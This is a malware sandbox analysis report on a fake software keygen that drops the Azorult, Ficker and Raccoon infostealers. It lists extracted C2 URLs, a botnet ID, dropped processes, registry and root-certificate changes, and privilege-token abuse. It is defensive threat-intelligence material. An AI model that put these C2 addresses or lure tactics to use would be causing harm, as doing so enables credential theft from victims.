azorult | bcea55157912f2d34bfa834371e873d42295f86292bbe7b2b61b9bc030455a13

Analysis

max time kernel
13s
max time network
60s
platform
windows10_x64
resource
win10v20201028
submitted
25-03-2021 18:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3d_Video_Player_4_5_serial_maker.exe

Score

10^/10

azorult fickerstealer raccoon dfa7b4d385486b737f84d608857eb43733ffd299 discovery infostealer stealer trojan

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

fickerstealer

deniedfight.com:80

Extracted

Family

raccoon

Botnet

dfa7b4d385486b737f84d608857eb43733ffd299

Attributes

url4cnc
https://telete.in/j9ca1pel

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
3576	keygen-pr.exe
1528	keygen-step-1.exe
1488	keygen-step-3.exe
2064	keygen-step-4.exe
2124	key.exe
2532	Setup.exe
3988	key.exe
3736	multitimer.exe
4008	setups.exe
548	askinstall20.exe
188	setups.tmp

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 7 IoCs

pid	Process
188	setups.tmp
188	setups.tmp
188	setups.tmp
188	setups.tmp
188	setups.tmp
188	setups.tmp
188	setups.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
138	api.ipify.org
149	ip-api.com
98	ipinfo.io
105	ipinfo.io
137	checkip.amazonaws.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2124 set thread context of 3988	2124	key.exe	89

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5192	5852	WerFault.exe	130

Kills process with taskkill 1 IoCs

evasion

pid	Process
4308	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000b4452d7ba69d3e664a20404859f1ca95bc6eecfa9932f228f3329272a34dce1687a80572f9936fe565df85a284d801f1b3587fd007950678cdaa3683f80549a573218956914aba149f591fd36f89572865e79ecbda08eebb33f081d1ff56fd36cece25cb5a63535d27b1cbab91a25198103b0956932dde320a225e38a5e0397bd4d0190b477cc92cee057f7ef9c4c360d87314a53ba35a837b6187ebea43695d1d4883a8213618be0d7790d75790517f93b13e61a609fbcb29cd0445311f45b25354bc97ba312af5c9258fbaafa42d802914759acd01bdc70f867a596c145b669d156f8bfd0dd948c431551674a299ba71bcb309332a43012aac1b6245c20148f4ab8ea2e76a80be0eba45bbed28472288c853aae12321121d5f64f75ac9bc5d1237d86366e939f1f1df1d4162d8dfa2ad5a5899f08e7ef85bbf451576c990ccbbd795090a2838326dc2d5b808508c0feb91aa4e7f0a7a7730ec90f78e61c94feaac412110c80badeb81522aaa3148a4358d401eb6365e8b3806cec19733953b67d7ff72f269a3a64d3e2ae8441c470e1a6e7b0d75b43aeb2879b1838ef1cf532a418d649ccf	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000c1e9feeb812584af7b2e107cfadf0863d16678d245fe8cb8f6b3d544da1e5811283aeb904ad45277f341691763454c75d25783b9f8cbf2486c6cf5de0796c509e5f3246a12481d6d9d06235853e17a2cf3b090a6809e6c6b7441	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2416	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	101	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	107	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
188	setups.tmp
188	setups.tmp

Suspicious use of AdjustPrivilegeToken 41 IoCs

description	pid	Process
Token: SeDebugPrivilege	2532	Setup.exe
Token: SeCreateTokenPrivilege	548	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	548	askinstall20.exe
Token: SeLockMemoryPrivilege	548	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	548	askinstall20.exe
Token: SeMachineAccountPrivilege	548	askinstall20.exe
Token: SeTcbPrivilege	548	askinstall20.exe
Token: SeSecurityPrivilege	548	askinstall20.exe
Token: SeTakeOwnershipPrivilege	548	askinstall20.exe
Token: SeLoadDriverPrivilege	548	askinstall20.exe
Token: SeSystemProfilePrivilege	548	askinstall20.exe
Token: SeSystemtimePrivilege	548	askinstall20.exe
Token: SeProfSingleProcessPrivilege	548	askinstall20.exe
Token: SeIncBasePriorityPrivilege	548	askinstall20.exe
Token: SeCreatePagefilePrivilege	548	askinstall20.exe
Token: SeCreatePermanentPrivilege	548	askinstall20.exe
Token: SeBackupPrivilege	548	askinstall20.exe
Token: SeRestorePrivilege	548	askinstall20.exe
Token: SeShutdownPrivilege	548	askinstall20.exe
Token: SeDebugPrivilege	548	askinstall20.exe
Token: SeAuditPrivilege	548	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	548	askinstall20.exe
Token: SeChangeNotifyPrivilege	548	askinstall20.exe
Token: SeRemoteShutdownPrivilege	548	askinstall20.exe
Token: SeUndockPrivilege	548	askinstall20.exe
Token: SeSyncAgentPrivilege	548	askinstall20.exe
Token: SeEnableDelegationPrivilege	548	askinstall20.exe
Token: SeManageVolumePrivilege	548	askinstall20.exe
Token: SeImpersonatePrivilege	548	askinstall20.exe
Token: SeCreateGlobalPrivilege	548	askinstall20.exe
Token: 31	548	askinstall20.exe
Token: 32	548	askinstall20.exe
Token: 33	548	askinstall20.exe
Token: 34	548	askinstall20.exe
Token: 35	548	askinstall20.exe
Token: SeDebugPrivilege	4308	taskkill.exe
Token: SeDebugPrivilege	3736	multitimer.exe
Token: SeDebugPrivilege	4412	MicrosoftEdge.exe
Token: SeDebugPrivilege	4412	MicrosoftEdge.exe
Token: SeDebugPrivilege	4412	MicrosoftEdge.exe
Token: SeDebugPrivilege	4412	MicrosoftEdge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4008	setups.exe
188	setups.tmp
4412	MicrosoftEdge.exe

